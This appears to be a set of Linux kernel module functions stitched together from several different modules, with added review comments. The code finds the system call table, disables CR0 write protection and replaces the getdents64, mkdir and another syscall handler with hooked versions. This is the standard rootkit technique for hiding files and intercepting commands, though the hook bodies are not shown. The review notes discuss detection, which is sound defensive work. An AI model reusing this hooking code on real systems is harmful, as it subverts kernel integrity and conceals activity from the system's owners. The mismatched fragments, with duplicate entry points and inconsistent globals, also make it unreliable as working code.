/*
 * monitor_init - module entry point; redirects the getdents64 system call.
 *
 * Locates the system call table through getscTable(), forces the upper
 * 32 bits of that address to all ones, and replaces the __NR_getdents64
 * slot with hacked_getdents. The previous handler is kept in orig_getdents
 * so the exit path can put it back. hacked_getdents is defined elsewhere,
 * so what the replacement handler does is not visible from this function.
 *
 * Returns 0 when the slot was rewritten, -1 when the table could not be
 * found or the slot already points at hacked_getdents.
 *
 * Review notes:
 *  - Rewriting a system call table slot is a kernel integrity violation.
 *    A check that compares table entries against the kernel text range
 *    would flag the replaced pointer.
 *  - The printk() calls below write the table address and both handler
 *    addresses to the kernel log, leaving a load-time artifact there.
 */
static int __init monitor_init(void)
{
    sys_call_table = getscTable();
    if (sys_call_table == NULL) {
        printk(KERN_INFO "%s:can't find system_call table.\n", __FUNCTION__);
        return -1;
    }

    /* Force the high 32 bits of the located address to all ones. */
    sys_call_table = (unsigned long *)((unsigned long)sys_call_table | 0xffffffff00000000);
    printk("sys_call_table address is 0x%lx\n", (unsigned long)sys_call_table);

    /*
     * NOTE(review): this debug print uses the literal index 217 while the
     * hook below uses __NR_getdents64; presumably they name the same slot.
     * Confirm for the target architecture.
     */
    printk("here 1,sys_getdents64__address is 0x%lx\n", sys_call_table[217]);

    /* Slot already points at the replacement handler: report failure. */
    if (sys_call_table[__NR_getdents64] == (unsigned long)hacked_getdents) {
        return -1;
    }

    /*
     * Hook sys_getdents64. clear_and_return_cr0()/setback_cr0() bracket the
     * write; presumably they drop and restore CR0 write protection (helpers
     * are not shown here).
     */
    orig_cr0 = clear_and_return_cr0();
    orig_getdents = (void *)sys_call_table[__NR_getdents64];
    if (hacked_getdents != NULL) {
        sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents;
    }
    printk(KERN_ALERT "orig getdents:0x%lx,hacked getdents:0x%lx.\n",
           (unsigned long)orig_getdents, (unsigned long)hacked_getdents);
    setback_cr0(orig_cr0);

    return 0;
}
/*
 * lkm_exit - module exit path; puts the saved mkdir handler back.
 *
 * Writes origin_mkdir into the __NR_mkdir slot of syscall_table, with the
 * write bracketed by clear_and_return_cr0()/setback_cr0(), then logs
 * "lkm_exit" at KERN_ALERT.
 *
 * NOTE(review): the slot is restored unconditionally. Nothing here checks
 * that syscall_table is non-NULL or that the init path ever stored a value
 * in origin_mkdir. Confirm this function cannot run after a failed init.
 */
static void lkm_exit(void)
{
    unsigned int saved_cr0;

    saved_cr0 = clear_and_return_cr0();
    syscall_table[__NR_mkdir] = (unsigned long)origin_mkdir;
    setback_cr0(saved_cr0);

    printk(KERN_ALERT "lkm_exit\n");
}
/*
 * my_cleanup_module - module unload; restores the original system call.
 *
 * Logs "exit ok", then writes orig_syscall back into the SYSCALL_NUM slot
 * of sys_call_table. The write happens between clear_and_return_cr0() and
 * setback_cr0(), which clear and then restore bit 16 of the CR0 register.
 */
void my_cleanup_module(void)
{
    printk("exit ok\n");

    /* Clear bit 16 of CR0 so the table slot can be written. */
    orig_cr0 = clear_and_return_cr0();

    /* Put the saved system call handler back. */
    sys_call_table[SYSCALL_NUM] = orig_syscall;

    /* Restore bit 16 of CR0. */
    setback_cr0(orig_cr0);
}
/*
 * monitor_cleanup - module exit path; undoes the getdents64 redirection.
 *
 * The __NR_getdents64 slot is restored from orig_getdents only when the
 * table pointer is set and the slot still holds hacked_getdents. Otherwise
 * the table is left untouched. "module exit." is logged in every case.
 */
static void __exit monitor_cleanup(void)
{
    int hook_installed;

    /*
     * Disabled in the original source (restore of entry 57):
     * if((sys_call_table[57]!=sys_fork_default_handler)&&sys_fork_default_handler)
     *     sys_call_table[57]=sys_fork_default_handler;
     */

    /* Short-circuit keeps the table from being read through a NULL pointer. */
    hook_installed = sys_call_table &&
                     (sys_call_table[__NR_getdents64] == (unsigned long)hacked_getdents);

    if (hook_installed) {
        /* The write is bracketed by the CR0 helpers, as on the init path. */
        orig_cr0 = clear_and_return_cr0();
        sys_call_table[__NR_getdents64] = (unsigned long)orig_getdents;
        setback_cr0(orig_cr0);
        printk(KERN_INFO "Restore sys_getdents64.\n");
    }

    printk("module exit.\n");
}
/*
 * my_init_module - module initialization; replaces one system call handler.
 *
 * Logs SYSCALL_NUM and the table address, saves the current handler of the
 * SYSCALL_NUM slot in orig_syscall, and stores hacked_cmd in its place.
 * Always returns 0.
 *
 * Review notes:
 *  - sys_call_table is used without a NULL check. How it is obtained is not
 *    visible here.
 *  - Both printk() calls land in the kernel log, so the syscall number and
 *    table address are recorded at load time.
 *  - A replaced system call table slot is a kernel integrity violation that
 *    a comparison of table entries against the kernel text range would show.
 */
int my_init_module(void)
{
    printk("init ok, SYSCALL NUM = %d\n", SYSCALL_NUM);
    printk("table at %p\n", sys_call_table);

    /* Clear bit 16 of CR0 so the table slot can be written. */
    orig_cr0 = clear_and_return_cr0();

    /* Remember the original handler, then install the replacement. */
    orig_syscall = sys_call_table[SYSCALL_NUM];
    sys_call_table[SYSCALL_NUM] = hacked_cmd;

    /* Restore bit 16 of CR0. */
    setback_cr0(orig_cr0);

    return 0;
}
/*
 * lkm_init - module entry point; redirects the mkdir system call.
 *
 * Looks up the system call table with get_sys_call_table(), saves the
 * current __NR_mkdir handler in origin_mkdir, and stores modified_mkdir in
 * that slot. The write is bracketed by clear_and_return_cr0()/setback_cr0().
 *
 * Returns 0 on success, -1 when the table address could not be found.
 *
 * Review notes:
 *  - The table pointer is cast to unsigned int * while the stored handler
 *    is cast to unsigned long. The declared type of syscall_table is not
 *    visible here. Confirm the element width matches the platform's
 *    pointer size.
 *  - A replaced system call table slot is a kernel integrity violation that
 *    a comparison of table entries against the kernel text range would show.
 *    The KERN_ALERT messages below also leave a load-time kernel log entry.
 */
static int lkm_init(void)
{
    unsigned int saved_cr0;

    printk(KERN_ALERT "lkm_init\n");
    conivent_printf("lkm_init");

    syscall_table = (unsigned int*) get_sys_call_table();
    if (!syscall_table) {
        printk(KERN_ALERT "can't find syscall_table addr\n");
        return -1;
    }

    /* Keep the original handler so the exit path can restore it. */
    origin_mkdir = syscall_table[__NR_mkdir];

    saved_cr0 = clear_and_return_cr0();
    syscall_table[__NR_mkdir] = (unsigned long) modified_mkdir;
    setback_cr0(saved_cr0);

    return 0;
}